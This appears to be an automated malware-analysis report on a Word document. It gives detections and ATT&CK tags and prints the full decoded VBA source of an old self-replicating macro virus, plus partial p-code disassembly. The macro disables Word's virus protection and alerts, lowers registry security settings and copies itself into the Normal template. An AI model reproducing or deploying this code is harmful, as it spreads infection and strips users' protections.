MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening. The macro attempts to write a temporary file to the system's TEMP directory and then injects code into it. The ClamAV detection of 'Win.Trojan.Psycho-3' further supports its malicious nature. The macro's obfuscation and dynamic file naming make precise IOC extraction challenging, but the temporary file path is identified.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5804 bytes |
SHA-256: 3bf3ef92f4135de364537ea1c66a0118204ba6692916c9a1bcf813530c658054 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
γ = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") & ".\TEMP\"
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP"
Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65))
Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�
' Processing file: /opt/analyzer/scan_staging/348bfa2dfb20438fb73a088c1cdb0275.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3547 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitDI2 0x0000
' Paren
' Ld Options
' MemSt VirusProtection
' Line #4:
' LitDI2 0x0000
' Paren
' Ld Options
' MemSt SaveNormalPrompt
' Line #5:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt DisplayAlerts
' Line #6:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt ScreenUpdating
' Line #7:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt EnableCancelKey
' Line #8:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #9:
' LitStr 0x0000 ""
' LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' LitStr 0x000A "SystemRoot"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0007 ".\TEMP\"
' Concat
' St γ
' Line #10:
' Ld γ
' LitStr 0x0000 ""
' LitStr 0x000F "DefaultFileName"
' Ld System
' ArgsMemLd ProfileString 0x0002
' Concat
' ArgsLd FileLen 0x0001
' LitDI2 0x0000
' Eq
' DoWhile
' Line #11:
' ArgsCall Read 0x0000
' BoS 0x0000
' LitStr 0x000C "~WR00000.TMP"
' St α
' Line #12:
' LitDI2 0x001A
' Ld Rnd
' Mul
' Paren
' LitDI2 0x0041
' Add
' FnInt
' ArgsLd Chr 0x0001
' Ld α
' LitDI2 0x0004
' LitDI2 0x0001
' Mid
' Line #13:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' Ld α
' LitDI2 0x0008
' LitDI2 0x0001
' Mid
' Line #14:
' Ld γ
' Ld α
' Concat
' Paren
' LitDI2 0x0001
' Ld VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #15:
' Ld γ
' Ld α
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #16:
' StartForVariable
' Ld η
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' BoS 0x0000
' LitDI2 0x0001
' Ld �
' LineInput
' BoS 0x0000
' StartForVariable
' Next
' BoS 0x0000
' LitStr 0x0000 ""
' St η
' Line #17:
' Ld ι
' LitStr 0x0002 "'�"
' Eq
' DoUnitil
' Line #18:
' LitDI2 0x00
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.